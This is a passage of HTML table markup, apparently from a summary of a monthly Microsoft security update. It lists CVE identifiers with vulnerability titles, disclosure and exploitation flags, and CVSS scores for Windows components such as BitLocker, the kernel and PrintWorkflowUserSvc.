Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55697"><span style='font-size: undefined;'>CVE-2025-55697</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Local Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53139"><span style='font-size: undefined;'>CVE-2025-53139</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Hello Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55698"><span style='font-size: undefined;'>CVE-2025-55698</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DirectX Graphics Kernel Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59200"><span style='font-size: undefined;'>CVE-2025-59200</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Data Sharing Service Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55326"><span style='font-size: undefined;'>CVE-2025-55326</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Connected Devices Platform Service (Cdpsvc) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59502"><span style='font-size: undefined;'>CVE-2025-59502</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Procedure Call Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59206"><span style='font-size: undefined;'>CVE-2025-59206</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59210"><span style='font-size: undefined;'>CVE-2025-59210</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55693"><span style='font-size: undefined;'>CVE-2025-55693</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48004"><span style='font-size: undefined;'>CVE-2025-48004</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Brokering File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59189"><span style='font-size: undefined;'>CVE-2025-59189</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Brokering File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53717"><span style='font-size: undefined;'>CVE-2025-53717</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55340"><span style='font-size: undefined;'>CVE-2025-55340</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Remote Desktop Protocol Security Feature Bypass</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55685"><span style='font-size: undefined;'>CVE-2025-55685</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55686"><span style='font-size: undefined;'>CVE-2025-55686</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55689"><span style='font-size: undefined;'>CVE-2025-55689</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55331"><span style='font-size: undefined;'>CVE-2025-55331</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55684"><span style='font-size: undefined;'>CVE-2025-55684</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55688"><span style='font-size: undefined;'>CVE-2025-55688</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55690"><span style='font-size: undefined;'>CVE-2025-55690</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55691"><span style='font-size: undefined;'>CVE-2025-55691</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59193"><span style='font-size: undefined;'>CVE-2025-59193</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Management Services Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59194"><span style='font-size: undefined;'>CVE-2025-59194</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59261"><span style='font-size: undefined;'>CVE-2025-59261</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Graphics Component Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50174"><span style='font-size: undefined;'>CVE-2025-50174</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Device Association Broker Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58727"><span style='font-size: undefined;'>CVE-2025-58727</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59289"><span style='font-size: undefined;'>CVE-2025-59289</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Bluetooth Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59195"><span style='font-size: undefined;'>CVE-2025-59195</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Graphics Component Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54957"><span style='font-size: undefined;'>CVE-2025-54957</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MITRE CVE-2025-54957: Integer overflow in Dolby Digital Plus audio decoder</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58731"><span style='font-size: undefined;'>CVE-2025-58731</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58734"><span style='font-size: undefined;'>CVE-2025-58734</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58738"><span style='font-size: undefined;'>CVE-2025-58738</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55681"><span style='font-size: undefined;'>CVE-2025-55681</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Desktop Windows Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59257"><span style='font-size: undefined;'>CVE-2025-59257</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Local Session Manager (LSM) Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-48813"><span style='font-size: undefined;'>CVE-2025-48813</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Virtual Secure Mode Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55334"><span style='font-size: undefined;'>CVE-2025-55334</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55333"><span style='font-size: undefined;'>CVE-2025-55333</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55338"><span style='font-size: undefined;'>CVE-2025-55338</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55330"><span style='font-size: undefined;'>CVE-2025-55330</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55332"><span style='font-size: undefined;'>CVE-2025-55332</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55337"><span style='font-size: undefined;'>CVE-2025-55337</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55682"><span style='font-size: undefined;'>CVE-2025-55682</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55676"><span style='font-size: undefined;'>CVE-2025-55676</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows USB Video Class System Driver Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55325"><span style='font-size: undefined;'>CVE-2025-55325</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Storage Management Provider Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59203"><span style='font-size: undefined;'>CVE-2025-59203</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows State Repository API Server File Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59204"><span style='font-size: undefined;'>CVE-2025-59204</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Management Services Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59186"><span style='font-size: undefined;'>CVE-2025-59186</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55683"><span style='font-size: undefined;'>CVE-2025-55683</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55699"><span style='font-size: undefined;'>CVE-2025-55699</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59197"><span style='font-size: undefined;'>CVE-2025-59197</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows ETL Channel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55336"><span style='font-size: undefined;'>CVE-2025-55336</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59184"><span style='font-size: undefined;'>CVE-2025-59184</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Storage Spaces Direct Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59260"><span style='font-size: undefined;'>CVE-2025-59260</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Failover Cluster Virtual Driver Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47979"><span style='font-size: undefined;'>CVE-2025-47979</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Failover Cluster Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-2884"><span style='font-size: undefined;'>CVE-2025-2884</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cert CC: CVE-2025-2884 Out-of-Bounds read vulnerability in TCG TPM2.0 reference implementation</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55679"><span style='font-size: undefined;'>CVE-2025-55679</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58719"><span style='font-size: undefined;'>CVE-2025-58719</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: 